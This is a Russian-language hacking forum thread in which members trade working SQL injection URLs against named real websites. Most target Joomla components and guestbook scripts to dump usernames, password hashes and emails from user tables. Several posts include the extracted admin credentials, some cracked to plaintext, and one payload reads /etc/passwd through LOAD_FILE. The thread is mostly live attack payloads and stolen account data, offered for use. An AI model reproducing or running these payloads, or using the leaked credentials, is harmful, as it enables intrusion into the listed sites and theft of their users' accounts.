SQL Инъекции

Code:

http://avtovaz.ru/model_info.php?id=23408+order+by+14/*

 

HTML:

 http://www.mitsar.info/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*

http://www.skodapart.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*

http://www.murmansecurity.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*

http://www.tnn-plus.ru/http://www.murmansecurity.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*

http://reenergy.by/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*  

 

вроде небыло.в поиске пусто.

EDU

 

HTML:

  http://support.gateway.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*

http://www.psy-con.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*

http://www.yourczech.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*

http://paramedik.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*  

 

Code:

http://getawebsite.co.za/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*

therondp:cfef632b3d7e57efb0f30c5ff9e91abf:BsmotIJaEl4n7U1e

Code:

http://www.bacanak.net/1/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*

bacanak:26038c3e7eb3efb12aac8afa64b8aec1

Code:

http://www.lppa.org.ls/index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSWORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+from+mos_content_comments+where+1=1

admin:21232f297a57a5a743894a0e4a801fc3
admin:admin

Code:

http://www.guvengrafik.com/tr/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*

хостер кажется) и домены регает)
administrator:90486f2dcc50866c520f11ff7bb467c6:yj

Code:

http://www.chkms.ch/cms/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*

тоже хостер кажется)
admin:8f539ba7f137838d79190c4fbf4c7fcf:eDSKldF6i9wjTBhk

Code:

http://www.seventystudio.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*

admin:7d63bf9dd9782614b7a8ad08471efdab:ELjNXMlvo6WJXDK2

Code:

http://www.soulofthenet.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*

admin:b99e3a9bb071a4a1bf92b999855677fd

 

http://www.dsl-ru.de/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,table_name,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/information_schema.tables/*

Не вышло((

 

google.com reply:

Возможно вы имели ввиду:

HTML:

http://www.dsl-ru.de/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=1+UNION+SELECT+1,convert(concat_ws(0x3a,version(),user(),database())+using+latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

 

Я по образцу делал,думал прокатит- такого метода вообще не встречал.Мошь опишешь вкратце.что ты сделал? Я понял,что ты преобразовал в латин...А почему так не знаю(.И гайдов я таких не видел...........................

 

HTML:

http://www.champ.co.za/clients/comments.php?id=-1/**/UNION/**/SELECT/**/name,password,null,null,null,null,null,null,null,null,null/**/FROM/**/wsnguest_members/*

HTML:

http://littlelindsay.com/guest/comments.php?id=-1/**/UNION/**/SELECT/**/name,password,null,null,null,null,null,null,null,null,null/**/FROM/**/wsnguest_members/*

HTML:

http://www.svg-soccer.de/B1/gbook/comments.php?id=-1/**/UNION/**/SELECT/**/name,password,null,null,null,null,null,null,null,null,null/**/FROM/**/wsnguest_members/*

HTML:

http://www.paulnicholasonline.com/guestbook/comments.php?id=-1/**/UNION/**/SELECT/**/name,password,null,null,null,null,null,null,null,null,null/**/FROM/**/wsnguest_members/*

HTML:

http://www.djmanumax.nl/guestbook/comments.php?id=-1/**/UNION/**/SELECT/**/name,password,null,null,null,null,null,null,null,null,null/**/FROM/**/wsnguest_members/*

сдесь даже хеши побрутил =)))
вот то что осилил
D@|\\||\\|Y:daa823a5957eb5bf86d93b22473cc241:eltax
cemonvicta:1a9e8503f4f1a5a08d550aee1fb9ae05:suikervrij
PS по ходу я сегодня спать то не буду да?! завтра наботу веть (((

 

HTML:

  http://www.mfgang.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*

http://www.cornel.biz/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*

http://super-plitka.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
  

 

Code:

http://softall.ru/item.php3?id=1483'

больше ниче не могу сделать ) (((
А сайт кстати довольно крупный

 

во первых обычный сайт без посещаемости -НЕ КРУПНЫЙ
во вторых тебе не в эту тему - тебе в "помощь по скулю?"
в третеих вот

5.0.26
Модер - Dizel_12izel_12

 

http://www.capetown2007.co.za/articles.php?id=38+union+select+table_name+1,2,3,4,5,6,7+from+information_schema.tables/*
заипалсо лимитом листать таблицы ))

 

Code:

http://www.poetryclub.com.ua/getpoem.php?id=54504'

 

один из крупнейших софт-порталов )

 

rankor777, вылаживай раскрытые скули или получишь минус

 

Code:

http://saveoka.com/opinion.php?id=-1+union+select+1,2,3,version(),5/*

Сайт про ОКУ

 

Code:

http://top.privetparis.com/index.php?cat_id=99999+union+select+1,2,3,4,5,6/*

pp_top@localhost: pp_top:5.0.45-community-log

Code:

http://www.aqualang.ru/index.php?cat_id=99999'+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10,11,12/*

mh3spea_vallwww@localhost:mh3spea_aqualang:5.0.45-community-log

Code:

http://www.dotfiles.com/index.php?cat_id=99999+union+select+1/*

blog@localhost:dotfiles:5.0.32-Debian_7etch4-log

 

Довольно извесный ресурс

Code:

http://hardvision.ru/index.php3?dir=news&action=pc&id=-9918+union+select+1,2,3,TABLE_NAME,5,6,7,8+FROM+INFORMATION_SCHEMA.TABLES--
http://hardvision.ru/index.php3?dir=news&action=pc&id=-9918+union+select+1,2,3,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),5,6,7,8+FROM+INFORMATION_SCHEMA.TABLES--

 

HTML:

  http://wmotors.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*

http://www.maximus-omsk.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*